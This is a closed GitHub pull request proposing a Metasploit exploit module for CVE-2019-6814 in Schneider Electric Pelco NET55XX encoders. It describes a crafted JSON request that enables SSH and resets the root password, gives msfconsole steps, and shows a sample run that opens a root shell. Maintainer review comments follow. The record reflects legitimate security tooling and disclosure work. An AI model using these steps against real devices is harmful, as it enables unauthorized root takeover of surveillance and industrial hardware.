Add for Schneider Electric NET55XX Encoder (CVE-2019-6814) #12049

Closed

@vitorespf commented Jul 3, 2019

Description

Adding Schneider Electric Pelco NET55XX module affecting Webmin NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550).

This module exploits an inadequate access control vulnerability creating a malicious JSON request to the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.

Verification Steps

  1. start msfconsole
  2. use exploit/unix/http/schneider_electric_net55xx_encoder.rb
  3. Set rhosts [IP]
  4. Set new_password [NEW PASSWORD]
  5. exploit

Sample Run

msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
NEW_PASSWORD => msfrapid7
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run

[*] 192.168.34.2:22 - Attempt to start a SSH connection...
[*] 192.168.34.2:80 - Attempt to change the root password...
[+] 192.168.34.2:80 - Successfully changed the root password...
[+] 192.168.34.2:22 - Session established
[*] Found shell.
[*] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400

uname -a;id
Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
uid=0(root) gid=0(root) groups=0(root)

@vitorespf vitorespf changed the title Schneider Electric NET55XX Encoder exploit Add Schneider Electric NET55XX Encoder exploit Jul 9, 2019

@vitorespf vitorespf changed the title Add Schneider Electric NET55XX Encoder exploit Add for Schneider Electric NET55XX Encoder (CVE-2019-6814) Jul 9, 2019

@space-r7 (Contributor) commented Jul 10, 2019

Hi @vitorespf! Sorry for the delay on this PR. I noticed that this PR was submitted off of your master branch. First, please create a new branch and submit a new PR under that branch. Once that's done, we can start a review. Thank you!

@space-r7 space-r7 closed this Jul 10, 2019

@busterb (Member) commented Jul 10, 2019

Another thing, especially helpful with exploits that target specific hardware, is to include module docs with your PR that include how to set up vulnerable targets, what the module looks like in action, etc. (similar to what you provided in the PR description above). See https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation for more info.
